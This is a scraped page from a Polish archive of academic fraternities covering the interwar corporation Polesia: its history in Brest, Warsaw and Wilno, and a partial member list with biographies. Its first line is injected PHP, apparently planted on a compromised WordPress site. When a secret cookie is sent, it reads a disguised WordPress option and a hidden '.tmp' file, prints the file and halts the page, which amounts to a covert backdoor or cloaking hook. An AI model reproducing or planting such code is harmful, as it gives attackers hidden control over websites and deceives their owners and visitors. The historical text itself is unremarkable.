if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Polesia

Dekiel Stanisława Mickiewicza Nazwa:
Polska Akademicka Korporacja “Polesia”
Siedziba:
Brześć nad Bugiem, od 1926 r. Warszawa, od 1929 r. Wilno
Data powstania:
5 I 1925 r.
Barwy:
zielona – biała – złota (symbolika barw: trwałość idei korporacyjnej - jej czystość - szlachectwo)
Dewiza:
„Fines Poloniae Polonici Sunto” („Kresy Polski niech pozostaną polskimi”), (w pierwszych latach działalności: „Fines semper Polonicae omniaque pro Patria”)

Rys historyczny

Herb Polesii, 1935 r.

Korporacja Polesia została założona 5 I 1925 r. w Brześciu nad Bugiem. Inicjatorami powołania byli: Tadeusz Gerwal, student Uniwersytetu Poznańskiego, Roman Nasierowski, student Politechniki Warszawskiej oraz Czesław Szpądrowski, student Uniwersytetu Stefana Batorego w Wilnie. Specyficznym celem Polesii, określonym w protokole organizacyjnym, była obrona polskości oraz praca społeczna na Kresach Wschodnich w myśl dewizy “Fines semper Polonicae, omnique pro Patria”. Polesia miała początkowo nietypowy charakter. Była bowiem jedyną w dwudziestoleciu międzywojennym w Polsce korporacją o charakterze wakacyjnym. Zrzeszała akademików z Brześcia studiujących na wyższych uczelniach w różnych ośrodkach akademickich. Regularna działalność korporacji miała się odbywać w okresie przerw międzysemestralnych i okresów świątecznych. Z tego powodu w dniu 7 V 1925 r. Polesia została przyjęta do Związku Polskich Korporacji Akademickich jako członek nadzwyczajny (data starszeństwa związkowego: 11 V 1925 r.).

Uroczystości X-lecia Polesii, Wilno 3 V 1935 r.

Wakacyjny charakter korporacji okazał się rozwiązaniem mało praktycznym, tak że dnia 27 (?) XII 1926 r. (?) podjęto decyzję o przeniesieniu siedziby do Warszawy i rozpoczęciu podobnie jak inne korporacje regularnej działalności w jednym ośrodku akademickim. W związku z tym, już na normalnych warunkach, Polesia zaczęła kandydować do Związku Polskich Korporacji Akademickich pod opieką K! Sparta. Na członka rzeczywistego zwyczajnego przyjęta została ostatecznie na VII Zjeździe (?) Związku Polskich Korporacji Akademickich w Poznaniu dnia 1 II 1927 r. (?). Także jednak w Warszawie Polesii nie udało się rozwinąć szerszej działalności. W związku z trudnościami kadrowymi w dniu 22 V 1929 r. postanowiono o przeniesieniu siedziby do Wilna. Decyzja ta okazała się trafna.

Siedziba Polesii, sala rycerska, Wilno 20 II 1931 r.
W Wilnie Polesia znalazła korzystne warunki dla swojego rozwoju. Przyczynił się do tego fakt, że jeszcze w 1929 r. wstąpiła do niej skupiona wokół Marka Litiwińskiego grupa byłych członków Korporacji Vilnensia o poglądach narodowych. Polesia stała się jedną z najbardziej prężnych korporacji wileńskich. Członkowie Polesii aktywnie angażowali się w życie akademickie i społeczno-polityczne. Przez całe niemal lata 30-te członkowie Polesii byli prezesami najważniejszej organizacji studenckiej - Bratniej Pomocy Studentów USB oraz najważniejszej politycznej organizacji młodzieżowej - Młodzieży Wszechpolskiej. Sama Polesia uchodziła za najbardziej narodową korporację wileńską.

Kuratorem Polesii z ramienia Senatu Uniwersytetu był prof. Wacław Komarnicki, a siedziba mieściła się przy ul. Garbarskiej 1/16 w Wilnie (1935/36).

Zawała kartel dnia 21 marca 1937 r. we Lwowie oraz 8 V 1937 r. w Wilnie z K! Scythia ze Lwowa.

Spotkanie Polesii, Warszawa jesień 1974 r.

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 122 nazwiska, w tym 7 członków honorowych.

W okresie powojennym Polesia zorganizowała – o ile wiadomo – jedno duże spotkanie. Odbyło się ono 2 V 1959 r. w Dziekanowie Leśnym pod Warszawą, a wzięło w nim udział aż 36 członków korporacji. W związku z faktem, że zjazdem zainteresował się Urząd Bezpieczeństwa, a uczestników wzywano na przesłuchania, w dalszych latach zaniechano tego rodzaju spotkań. W późniejszym okresie, do lat 90-tych, spotkania członków Polesii odbywały się w mniejszych grupach.

Lista członków

Poniższa, niekompletna lista członków Polesii obejmuje ponad sto dwadzieścia nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

  Poczet sztandarowy Polesii, Wilno początek lat 30-tych.

 1. Stanisław Cywiński, (29 sierpnia 1887 w Mohylewie - 30 marca 1941 w Kirowie) doktor filozofii, historyk literatury, docent Uniwersytetu Stefana Batorego, Filister honorowy Polesii, dziennikarz pism wydawanych w Wilnie w okresie międzywojennym: endeckiego Dziennika Wileńskiego (też jako redaktor naczelny) i konserwatywnego Słowa, za użycie określenia “kabotyn” w aluzji do Marszałka Józefa Piłsudskiego skazany w 1938 r. na trzy lata więzienia, z których odsiedział pięć miesięcy (sprawa doprowadziła do uchwalenia przez Sejm ustawy o ochronie imienia Marszałka J. Piłsudskiego z sankcją karną do pięciu lat więzienia), w październiku 1939 aresztowany przez NKWD i wywieziony do Wiatłagru (rejon Wiatki), gdzie zmarł
 2. Leopold Dmowski, prawnik, sędzia, podprokurator I rewiru Brześcia, przewodniczący Rady Miejskiej w Brześciu, następnie prezydent miasta w latach 1922-27, jeden z liderów narodowo-demokratycznej większości w radzie miejskiej, prezes Klubu Obywatelskiego w Brześciu, członek Brzeskiego Towarzystwa Dobroczynności oraz Towarzystwa Opieki nad Kresami Wschodnimi, po odejściu z prezydentury komisarz wojewódzki LOPP, w latach 30. pracował jako pisarz hipoteczny, od 1925 Filister honorowy Polesii [vide szerzej Tomasz Otocki, Leopold Dmowski, maszynopis]
 3. Józef Jabłoński, inżynier, od 1925 Filister honorowy Polesii
 4. Wacław Komarnicki, (29 lipca 1891 w Warszawie - 19 marca 1954 w Londynie) syn Tytusa i Józefy z Suszyńskich, prawnik, działacz polityczny, poseł na Sejm RP z ramienia Narodowej Demokracji (1928-35), minister sprawiedliwości w rządzie emigracyjnym, profesor USB, członek Polskiej Akademii Umiejętności, specjalista z zakresu prawa państwowego oraz nauki o państwie, autor licznych prac naukowych, kurator i Filister honorowy Polesii.
 5. Ludwik Krechowiecki, doktor, od 1925 Filister honorowy Polesii
 6. Marek Pęski, doktor, od 1925 Filister honorowy Polesii
 7. Czesław Sypniewski, radca, Filister honorowy Polesii

Sobótka Polesii, Wilno luty 1931 r.

Członkowie rzeczywiści

 1. Władysław Andruszkiewicz, c. koniec lat 20-tych, i.p. “Marmur”, sekretarz 1931/32, sekretarz Wileńskiego Koła Międzykorporacyjnego 1931/32, kilkukrotny olderman, kurator Korporacji Filomatia Vilnensis, członek Sądu Koleżeńskiego Brataniej Pomocy USB 1934/35 i 1935/36, uczestnik Powstania Warszawskiego, wywieziony do Niemiec, mgr praw, radca prawny
 2. Jerzy Arendt, c. 1934-35

  Edmund Barancewicz, 1937 (?).

 3. Edmund Barancewicz, doktor medycyny

  Stanisław Bielecki, 1937 (?).

 4. Stanisław Bielecki, (?)

 5. Włodzimierz Borysiuk, założyciel
 6. Wacław Bronowski, ( - 1942 w ZSRR?) c. koniec lat 20-tych, prezes 1933, wiceprezes Sądu Koleżeńskiego USB 1934/35, pracownik Ministerstwie Wyznań Religijnych i Oświecenia Publicznego, w czasie wojny wywieziony z majątku na kresach do ZSRR, gdzie zmarł
 7. Stanisław Buszyński, absolwent Liceum Krzemienieckiego, c. ok. 1931
 8. Witold Butrymowicz, student PW, olderman 1927/28 i 1928/29
 9. Andrzej Cezary Chęciński, (30 marca 1912 w Radziwiłłowie - 8 stycznia 1991) c. ok. 1934, i.p. “Chęciorek”, student farmacji USB i UW, absolwent UW 1948, pochowany na cmentarzu komunalnym w Płocku
 10. Stanisław Chomiński, student UW, akt. 1928
 11. Czesław Choromański, student UW, założyciel, sekretarz 1927, wiceprezes 1927/28 i 1928/29
 12. Marian Cieszewski, 1937 r. (?).

 13. Mariusz Cieszewski, student chemii USB, c. ok. 1934-35, członek Komisji Rewizyjnej ZPKA XV kadencji, w czasie wojny we francuskim ruchu oporu, ukończył studia we Francji, wrócił do kraju

 14. Wacław Cmunt, (?)

  Andrzej Ćwirko-Godycki, 1937 (?).

 15. Andrzej Ćwirko-Godycki, c. druga poł. lat. 20-tych

 16. Florian Doliwa-Dobrowolski, ( - 1942/3?) absolwent Liceum Krzemienieckiego, c. 1935-36, prezes 1936/37, członek Zarządu Bratniej Pomocy USB 1934/35 i 1935/36, przewodniczący Komisji Rewizyjnej Bratniej Pomocy USB 1936/37, prawnik, wywieziony do ZSRR, w II Korpusie PSZ, poległ na polu chwały, pochowany na Polskim Cmentarzu Wojskowym pod Alexandrią (Egipt)
 17. Jerzy Dołner, początkowo w Korporacji Vilnensia, w 1929 wystąpił i przeszedł do Korporacji Polesia, członek Zarządu Akademickiej Kasy Chorych 1930/31, farmaceuta
 18. Witold Downar-Zapolski, założyciel Polesii, student PW, olderman 1927, prezes 1927/28 i 1928/29
 19. Władysław Downar-Zapolski, student UW (?), student USB, akt. 1928, członek Zarządu Koła Prawników USB 1928/29

  Jerzy Dubiel, 1937 (?).

 20. Jerzy Dubiel, c. ok. 1935, mgr praw, adwokat

  Marian Gawędzki, prawd. koniec lat 20-tych.

 21. Marian Gawędzki, (8 grudnia 1895 w Mariampolu na Litwie - lata 70-te) początkowo w Korporacji Vilnensia, w 1929 wystąpił i przeszedł do Polesii, mgr farmacji USB 1930

 22. Tadeusz Gerwel, (1904-1986) student UP, założyciel Polesii, pierwszy prezes 1925, akt. 1928, lekarz

  Kazimierz Giecewicz, ok. 1934 r. (?).

 23. Kazimierz Giecewicz, (1912 - 7 czerwca 1964) uczeń gimnazjów w Łunińcu i Brześciu nad Bugiem, student prawa USB, c. ok. 1931, członek Komisji Rewizyjnej Bratniej Pomocy USB 1934/35 i 1935/36, prezes Młodzieży Wszechpolskiej, w czasie wojny m.in. pracował fizycznie oraz w zarządzie miejskim w Lidzie, przez okres ponad dwóch miesięcy osadzony w niemieckim więzieniu, po wojnie organizował Tymczasową Milicję Obywatelską w pow. sandomierskim i krótko sprawodawł funkcję komisarza Milicji w Sandomierzu, od 1945 na Dolnym Śląsku, działacz Stronnictwa Demokratycznego w Namysłowie i Wrocławiu, sekretarz starostwa owiatowego w Namysłowie 1945-46, zastępca starosty powiatowego w Trzebnicy 1946-49, zastępca sekretarza 1949-55 oraz sekretarz 1955-64 Wojewódzkiego Komitetu SD we Wrocławiu, od 1954 radny Wojewódzkiej Rady Narodowej we Wrocławiu, przewodniczący Klubu Radnych SD, wiceprzewodniczący Wojewódzkiego Komitetu Frontu Jedności Narodu we Wrocławiu, dyrektor naczelny Wrocławskiej Drukarni Naukowej PAN 1961-64, odznaczony m.in. Srebrnym Krzyżem Zasługi 1946, Złotym Krzyżem Zasługi 1955, Krzyżem Kawalerskim OOP 1958, Krzyżem Partyzanckim, Medalem Wojska Polskiego, Medalem X-lecia PRL oraz 25-lecia SD, był honorowym obywatelem Świeradowa-Zdroju, pochowany na Cmentarzu Osobowickim we Wrocławiu [vide szerzej Tomasz Otocki, Kazimierz Giecewicz (1912-1964), maszynopis]

  Wacław Głouszek, 1937 (?).

 24. Wacław Głouszek, członek Zarządu Koła Historyków 1936/37, człoenk Zarządu Akademickiego Koła PMS 1936/37, członek Zarządu Bratniej Pomocy USB 1937/38, polonista

 25. Bronislaw Gnatowski, (1908-1968) c. koniec lat 20-tych, olderman 1932-33 (?), mgr praw, po wojnie adwokat
 26. Eugeniusz Goławski, student UW, akt. 1928

  Stanisław Gołębski, lata 30-te.

 27. Stanisław Gołębski, ( - 1939) prezes sem. let. 1935/36 (jednocześnie prezes w Prezydium Wileńskiego Koła Międzykorporacyjnego), członek Zarządu Bratniej Pomocy USB 1935/36 i 1936/37, członek Komisji Rewizyjnej Bratniej Pomocy USB 1937/38, sekretarz Młodzieży Wszechpolskiej 1931/32, członek Zarządu Młodzieży Wszechpolskiej 1932/33 i 1935/36, kierownik grodzki Sekcji Młodych Stronnictwa Narodowego 1935, prawnik, poległ na polu chwały na Wołyniu

 28. Czesław Gorecki, c. 1934-35, prawnik, w czasie wojny wywieziony do ZSRR, gdzie zmarł
 29. Stefan Grunwald, student UW, akt. 1928, farmaceuta
 30. Tadeusz Halicki, c. ok. 1935

  Wacław Hryniewicki, koniec lat 20-tych (?).

 31. Wacław Hryniewicki, (1907-1983) brat Ludomira (Concordia Vilnensis)

 32. Arkadiusz Jabłoński, c. 1933, prawnik, radca prawny

  Stanisław Janicki, 1935 r.

 33. Stanisław Janicki, członek Klubu Włóczykijów, z którego wystąpił, wstąpił do Polesii, c. 1934-35, i.p. “Klukwa”, członek Zarządu Bratniej Pomocy USB 1930/31, wiceprezes i p.o. prezes Bratniej Pomocy USB 1933/34, członek Sądu Koleżeńskiego Koła Prawników 1934/35, przewodniczący Sądu Koleżeńskiego Bratniej Pomocy USB 1935/36, prawnik, w czasie wojny wywieziony do łagrów w ZSRR, wyszedł z II Korpusem, po wojnie na emigracji Zachodzie i Stanach Zjednoczonych

 34. Franciszek Jankowski,
 35. Władysław Juchnowicz, (?)

  Edmund Karlicki (?), 1937 (?).

 36. Edmund Karlicki

  Tadeusz Karwowski, lata 30-te

 37. Tadeusz Karwowski, (27 października 1914 w Wilnie - 14 lutego 1987w Chorzowie) s. Kazimierza i Justyny ze Skawińskich, absolwent Gimnazjum oo. Salezjanów w Różanym Stoku 1933, student prawa USB 1933-39 (?), c. ok. 1934, olderman, absolwent Centrum Wyszkolenia Kawalerii w Grudziądzu 1937/38, plut. pchor. 1938,,wachmistrz 1939, w wojnie obronnej 1939 w 101 Pułku Kawalerii, po powrocie do Wilna pracował jako robotnik, od 1940 w ZWZ-AK (w składzie patrolu specjalnego wykonującego wyroki Sądu Specjalnego przez K.O. ZWZ), 1943 dowódca plutonów w kompaniach Józefa Świdy, a następnie Władysława Żogło I batalionu 77 Pułku Piechoty AK Okręgu Nowogrodzkiego, 1944 dowódca placówki AK w Werenowie, a następnie zastępca dowódcy szwadronu Ochrony Komendy Okręgu, w styczniu 1945 wyjechał do Białegostoku, osiedlił się w Chyliczkach k. Warszawy, student i absolwent (mgr prawa) UW 1945-47, od sierpnia 1947 radca w Ministerstwie Handlu Wewnętrznego w Warszawie, w latach 50-tych represjonowany, 1950-51 w więzieniu w Łęczycy i Łodzi, 1952-55 ukrywał się, w 1956 przeniósł się do Katowic, pracował w administracji publicznej na stanowiskach kierowniczych na Śląsku do przejścia w 1979 na emeryturę, m.in. naczelnik Wydziału w Przedsiębiorstwie Obrotu Tworzywami Sztucznymi w Gliwicach, kierownik Zakładu w Zakładzie Syntezy Lekkiej w Gliwicach, kierownik Zespołu w Okręgowych Urzędzie Jakości i Miar w Katowicach, kierownik Ośrodka Wzorcowych Nowoczesnych Wyrobów Rynkowych w Katowicach, pochowany na Cmentarzu na Służewie w Warszawie [Źródła (poza wskazanymi poniżej spisu członków), Andrzej Lisowski, Tadeusz Karwowski we wspomnieniach brata, Katowice 2014]

  Zbigniew Kasputis, 1937 (?).

 38. Zbigniew Kasputis, początkowo w Klubie Włóczęgów, wstąpił do Polesii, c. 1934-35, i.p. “Byczek”, świetny śpiewak, prawnik

  Stefan Kiełkiewicz (?), lata 30-te.Stefan Kiełkiewicz, po 1945 r. (?).

 39. Stefan Kiełkiewicz, c. 1933, członek Zarządu 1934/35 i 1935/36, wiceprezes i p.o. prezesa Bratniej Pomocy USB 1936/37, przewodniczący Akademickiego Komitetu Ślubowań Jasnogórskich 1936, w czasie wojny w wileńskiej konspiracji, lekarz, po wojnie w Kielcach

  Tadeusz Korycki, 1937 (?).

 40. Tadeusz Korycki, absolwent Liceum Krzemienieckiego, kierownik Sekcji Akademickiej Stronnictwa Narodowego, prezes Bratniej Pomocy USB 1938/39, prawnik, w czasie wojny (?) działacz SN w Londynie, po wojnie na emigracji w Wielkiej Brytanii

  Antoni Kozłowski, prawd. koniec lat 20-tych.

 41. Antoni Kozłowski, (17 października 1907 w Choćkowcach - 13 czerwca 1975 w Warszawie) s. Kazimierza i Kamilli z Ochrymowiczów, absolwent Gimnazjum w Wołkowysku, student i absolwent prawa USB 1926-30, początkowo w Korporacji Vilnensia, w 1929 wystąpił i przeszedł do Korporacji Polesia, sekretarz 1929/30, olderman 1930, działacz Młodzieży Wszechpolskiej, członek Zarządu Bratniej Pomocy USB 1929/30, członek Komisji Rewizyjnej Bratniej Pomocy USB 1930/31, po studiach aplikacja, egzamin sędziowski 1934, podprokurator 1934-39, wiceprokurator 1939, ppor. rez., w wojnie obronnej w 1939 w 20 Pułku Artylerii Lekkiej, w niemieckich obozach jenieckich w Arnaswalde, Grossborn, Sandbostel i Lubece 1939-45, po wojnie wiceprokurator Sądu Okręgowego w Warszawie 1947-49, wiceprokurator Sądu Apelacyjnego 1949, radca prawny w Wydziale Finansowym Rady Narodowej w Warszawie 1950-52, adwokat w Warszawie 1950-74

 42. Romulald Krechowiecki, student UW (?), student USB, założyciel Polesii, akt. 1925-29, wiceprezes 1929/30
 43. Stanisław Krechowiecki, początkowo w Korporacji Vilnensia, w 1929 wystąpił i przeszedł do Polesii, skreślony

  Karykatura Antoniego Krejwisa, Wilno 1930 r.

 44. Antoni Krejwis, początkowo w Korporacji Vilnensia, w 1929 wystąpił i przeszedł do Polesii, wiceprezes 1930, mgr praw, przed wojną asesor sądowy, po wojnie w księgowości

 45. Leonard Kroze, student SGGW, założyciel Polesii, akt. 1925-28, pierwszy olderman 1925
 46. Bohdan Kruszyński, student PW, akt. 1928
 47. Stanisław Kucewicz, ( - 23 lutego 1990 we Wrocławiu) absolwent Gimnazjum im. Króla Zygmunta Augusta w Wilnie 1925, początkowo w Korporacji Vilnensia, w 1929 wystąpił i przeszedł do Polesii, i.p. “Kuc”, członek Rady Naczelnej MW 1928/29, sekretarz Młodzieży Wszechpolskiej 1929/30, członek Sądu Koleżeńskiego Młodzieży Wszechpolskiej 1931/32, mgr praw USB, żołnierz AK, uczestnik Powstania Warszawskiego
 48. Tomasz Kuźniak, c. koniec lat 20-tych

  Mirosław Lepieszkiewicz, poł. lat 30-tych (?).

 49. Mirosław Lepieszkiewicz, (1914 - 3 stycznia 1997 w Barlinku) c. 1933, wiceprezes sem. let. 1935/36 ((jednocześnie wiceprezes w Prezydium Wileńskiego Koła Międzykorporacyjnego), członek Zarządu Bratniej Pomocy 1936/37 oraz 1937/38, przewodniczący Akademickiego Komitetu Ślubowań Jasnogórskich 1937, magister praw USB, adwokat

 50. Wacław Limakowski, c. 1933, prawnik, adwokat
 51. Kazimierz Lisowski, c. koniec lat 20-tych, przed wojną w Sztabie Generalnym WP, w czasie wojny w konspiracji, uczestnik Powstania Warszawskiego, po wojnie pracownik Politechniki Gdańskiej

  Marek Litwiński, ok. 1930 r.

 52. Marek Litwiński, ( - 1967) początkowo w Korporacji Vilnensia, w 1929 wystąpił i przeszedł do Polesii, prezes 1929, 1929/30 oraz 1930, prezes Towarzystwa Farmaceutów “Lechia” 1929/30, farmaceuta, w jego domu po wojnie odbywały się nieoficjalne komerse korporacyjne

 53. E. Liwius,
 54. Ireneusz Łapiński, założyciel Polesii
 55. Jerzy Łoziński, student PW, akt. 1928

  Władysław Mackiewicz, 1937 (?).

 56. Władysław Piotr Mackiewicz, c. 1933, członek Zarządu Koła Prawników 1935/36, członek Zarządu Bratniej Pomocy USB 1937/38, podchorąży rez. Kawalerii, prawnik, radca prawny

 57. Mieczysław Malczewski, student PW, akt. 1928
 58. Ryszard Malczewski, założyciel Polesii, pierwszy sekretarz 1925
 59. Jerzy Matuszewicz, student UW, akt. 1928

  Karykatura Stanisława Mickiewicza, 1932 r.

 60. Stanisław Mickiewicz, (1901-1996) początkowo w Korporacji Vilnensia, w 1929 wystąpił i przeszedł do Polesii, olderman 1929/30, sekretarz 1930/31, prawnik, adwokat

 61. Ryszard Moczulski, ( - wrzesień 1939) student USB i KUL, c. ok. 1934, prezes Bratniej Pomocy KUL, prawnik, poległ w kampanii wrześniowej

  Józef Musiatowicz, ok. 1934 r. (?).

 62. Józef Musiatowicz, (1913 - ) student prawa KUL, medycyny USB, absolwent USB 1939, lekarz, żołnierz kampanii wrześniowej 1939, w partyzantce 1944, po wojnie na Uniwersytecie w Gdańsku, a od 1953 w Białymstoku, prof. ginekologii i położnictwa

  Zbigniew Leon Nanowski, 21 X 1995 r.

 63. Leon Zbigniew Nanowski, (28 marca 1916 w Samarze (obec. Kujbyszew) - 29 stycznia 2006 w Warszawie) syn Leona i Heleny z Soszalskich, harcerz, absolwent Gimnazjum w Brześciu n. Bugiem, student prawa USB 1934-6, UP 1938/39, UMK 1949-51, c. 1935, kierownik Sekcji Akademickiej Stronnictwa Narodowego, magister praw USB, uczestnik kampanii wrześniowej 1939 w 2 pułku ułanów Grochowskich, internowany na Litwie, po ucieczce w okupowanej Polsce żołnierz AK, uczestnik Powstania Warszawskiego, wywieziony do Niemiec, po wyzwoleniu m.in. kierownik obozu repatriacyjnego w Oberhausen-Osterfeld, mgr praw UMK 1951, radca prawny, arbiter i znawca międzynarodowego prawa handlowego, m.in. wieloletni arbiter Polskiej Izby Handlu Zagranicznego w Warszawie, prezes Sądu Arbitrażowego dla Żeglugi Morskiej w Gdyni, przewodniczący Koła Weteranów II Pułku Ułanów Grochowskich, inicjator i organizator budowy nagrobku Romana Dmowskiego na Cmentarzu Bródnowskim w Warszawie, zastępca członka Zarządu 1993-95 oraz 1995-97, prezes 1997-99 Stowarzyszenia Filistrów Korporacji Akademickich, odznaczony Złotą Odznaką ZPKA, pochowany na cmentarzu na Bródnie

  Olgierd Narkiewicz, 1937 (?).

 64. Olgierd Narkiewicz,

  Witold Narkiewicz, 1937 (?).

 65. Witold Narkiewicz

 66. Romulald Nasierowski, student PW, założyciel Polesii, akt. 1925-28, prezes 1927, sekretarz 1927/28 oraz 1928/29

  Henryk Nieciejowski, 1937 (?).

 67. Henryk Nieciejowski (Naciejowski), c. ok. 1935, członek Zarządu Bratniej Pomocy USB 1936/37 oraz 1937/38, prawnik, radca prawny

 68. Nieciejowski (Naciejowski),
 69. Stanisław Niedźwiecki, student PW, akt. 1928
 70. Feliks Nowakowski, c. ok. 1934, i.p. “Pyc”, prawnik, pracownik Ministerstwa Handlu Wewnętrznego
 71. Romulald Nowicki,

  Wacław Olszewski, ok. 1934 r. (?).

 72. Wacław Olszewski, (13 lipca 1911 w Łukówce - 8 listopada 1991 w Augustowie) s. Władysława i Stanisławy z Wrotniewskich, absolwent Państwowego Gimnazjum im. Juliusza Słowackiego w Kowlu 1932, studnet prawa USB, c. ok. 1934, pracownik Zakładów Przemysłu Drzewnego w Hajnówce 1935-46, Zakładów Przemysłu Drzewnego w Gryfowie Śląskim 1947-60, a następnie ponowie znowu w Hajnówce 1947-91, pochowany na Cmentarzu w Hajnówce

  Czesław Oziewicz, ok. 1930 r.

 73. Czesław (oficjalnie Leonard Czesław) Oziewicz, (1913 w Grodnie - 1987 w Gdyni) s. Ignacego (pułkownika), brat stryjeczny Franciszka (Polesia), s. Ignacego, student i absolwent 1935 prawa USB, c. 1931, prawnik, adwokat, w czasie wojny w konspiracji

  Franciszek Oziewicz, 1928/29 r.

 74. Franciszek Oziewicz, (1910 w Szadryńsku k. Jekaterynburga - 1992) brat stryjeczny Czesława (Polesia), c. ok. 1930, matematyk, po studiach prof. w Gimnazjum Baranowiczach 1935-39, po wojnie od 1945 prof. Gimnazjum i Liceum w Inowrocławiu oraz w Seminarium Duchownym pod Inowrocławiem, pochowany na Cmentarzu w Przeźmierowie k. Poznania

  Stefan Pacanowski.

 75. Stefan Pacanowski, (16 lipca 1909 w Berdyczowie na Ukrainie - 13 listopada 1991 w Warszawie) s. Jakuba i Genowefy z Grodeckich, w 1925 przedostał się z Berdyczowa (Ukraina, ZSRR) do Polski, absolwent Liceum Krzemienieckiego 1929, student prawa USB, działacz akademicki i narodowy, kurator Korporacji Filomatia Vilnensis, członek Sądu Koleżeńskiego 1936/37 oraz przewodniczący Komisji Rewizyjnej Bratniej Pomocy USB 1937/38, przewodniczący Sądu Koleżeńskiego Koła Prawników 1938/39, prezes Młodzieży Wszechpolskiej 1933/34, przwodniczący Sądu Koleżeńskiego Młodzieży Wszechpolskiej 1935/36, członek Zarządu Okręgowego SN, prezes Młodzieży Narodowej (b.MW) 1938, aresztowany przez władze sanacyjne, działacz konspiracyjny, po wojnie więziony i represjonowany, zmuszony wielokrotnie zmieniać pracę, członek-założyciel reaktywowanego Stronnictwa Narodowego 1989, pochowany na Cmentarzu na Służewie w Warszawie

  Zdzisław Pankla, 1937 (?).

 76. Zdzisław Pankla, (1906?-1982) początkowo w Korporacji Vilnensia, w 1929 wystąpił i przeszedł do Polesii, członek Zarządu Bratniej Pomocy USB 1933/34, przewodniczący Komisji Rewizyjnej Bratniej Pomocy USB 1934/35 i 1935/36, prawnik, radca prawny

 77. Jan Pawłowski, początkowo w Korporacji Vilnensia, w 1929 wystąpił i przeszedł do Polesii, członek Zarządu Bratniej Pomocy USB 1928/29, członek Komisji Rewizyjnej Bratniej Pomocy USB 1929/30, farmaceuta

  Janusz Pietrzykowski, 1937 (?).

 78. Janusz Pietrzykowski, (1914 - 15 marca 1999 w Warszawie) olderman sem. let. 1935/36 (jednocześnie w Prezydium Wileńskiego Koła Międzykorporacyjnego), członek Zarządu Bratniej Pomocy USB 1934/35 i 1937/38, prawnik, sędzia i prezes Sądu Najwyższego

 79. Stanisław Eligiusz Poraziński, brat (?) Eligiusza (Polesia), początkowo w Korporacji Vilnensia, w 1929 wystąpił i przeszedł do Polesii
 80. Eligusz Poraziński, (?) brat Stanisława (?)
 81. Czesław Przednikiewicz, student PW, akt. 1927-28, wiceprezes 1927
 82. Jerzy Przyłuski, (30 października 1909 w Odessie - 9 sierpnia 2000 w Chicago) absolwent Liceum Krzemienieckiego 1929, harcerz, student prawa USB, członek Korporacji Polesia (Wilno), c. 1930, prezes Polesii 193?, działacz akademicki, wiceprezes Bratniej Pomocy USB 1932/33 oraz prezes Bratniej Pomocy USB 1933/34, członek Zarządu Młodzieży Wszechpolskiej 1931/32 i 1932/33, mgr praw USB 1933, adwokat, żołnierz września 1939 w 13 Dywizji Piechoty, wzięty do niewoli pod Kockiem, jeniec wojenny obozu Gross-Born, po wojnie na emigracji w Stanach Zjednoczonych, działacz polonijny, dziennikarz, redaktor Dziennika Związkowego, wieloletni prezes SN w Chicago, współzałożyciel i prezes Instytutu Romana Dmowskiego, dyrektor Krajowego i kierownik Głównego Biura Kongresu Polonii Amerykańskiej, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago, odznaczony medalem za udział w Kampanii Wrześniowej, Meritorious Service Award for many years of dedicated and loyal service (Zarząd Główny K.P.A., 1976), Distinguished Service Award (Zarząd Związku Narodowego Polskiego, 1992), Odznaką Zasługi dla Rzeczypospolitej Polskiej, (Prezydent RP, 1993), pochowany na Cmentarzu na Służewie w Warszawie

  Wacław Religioni, 1937 r. (?).

 83. Wacław Religioni, (20 grudnia 1911 - 6 lutego 1997 w Warszawie) c. 1932, i.p. “Waconek”, sekretarz sem. let. 1935/36 (jednocześnie sekretarz w Prezydium Wileńskiego Koła Międzykorporacyjnego), członek Zarządu Bratniej Pomocy USB 1932/33, magister praw USB 1936, sekretarz Delegatury Rządu RP na Okręg Wileński 1942, aresztowany 11 stycznia 1945, skazany na 10 lat łagrów, wrócił do Polski w 1955, pracował w Departamencie Nauki i Zdrowia MZiOS, pochowany na Powązkach

 84. Mirosław Rutkowski, c. ok. 1935, działacz narodowy, jako oficer rez. poległ w kampanii wrześniowej, pochowany na Powązkach Wojskowych w Warszawie

  Wacław Rudzki, 1974 r.

 85. Wacław Rudzki, c. druga poł. lat 20-tych (?), i.p. “Wachmistrz”, wiceprezes 1933, olderman (?), oficer rez. kawalerii, w czasie wojny w formacjach wojskowych na Zachodzie, po wojnie na emigracji w Wielkiej Brytanii

  Witold Saski, ok. 1928 r. (?).

 86. Witold Saski, (4 grudnia 1909 w Brześciu nad Bugiem - 4 sierpnia 2006 w Lincoln) syn Jerzego i Teresy z Marszalskich, absolwent Gimnazjum im. Romualda Traugutta w Brześciu 1927, student farmacji USB, początkowo w Korporacji Vilnensia, w 1929 wystąpił i przeszedł do Polesii, c. 1927, prezes 1930/31, olderman 1933, prezes Towarzystwa Farmaceutycznego “Lechia” 1932/33, mgr farmacji USB 1933, dr farmacji Uniwersytet w Bolonii 1946, w obozie pracy w republice Komi 1940-41, od. 1941 w II Korpusie (ZSRR, Środkowy Wschód, Włochy), po wojnie na emigracji w Wielkiej Brytanii a od 1951 w Stanach Zjednoczonych, prof. farmacji na uniwersytetach stanowych w Montanie 1951-52 i Nebrasce 1952-75, visiting professor University of California w san Francisco 1959-60 oraz Universita degli Studi di Pisa 1968, członek Polskiego Instytutu Naukowego w Nowym Jorku, Instytutu Józefa Piłsudskiego oraz Fundacji Kościuszkowskiej, autor licznych publikacji naukowych oraz wspomnień “Przez wiele mostów” (Warszawa 1992)

 87. Bronisław Smarzewski de Bogoray, student prawa USB, wyjechał do Rzymu gdzie wstąpił do seminarium, ksiądz katolicki

  Sławomir Sokołowski, 1937 (?).

 88. Sławomir Sokołowski, student prawa USB, c. 1932, członek Zarządu Bratniej Pomocy USB 1933/34, działacz OWP, redaktor “Ruchu Młodych” w “Dzienniku Wileńskim”

  Kazimierz Sowiński, 1931 r.

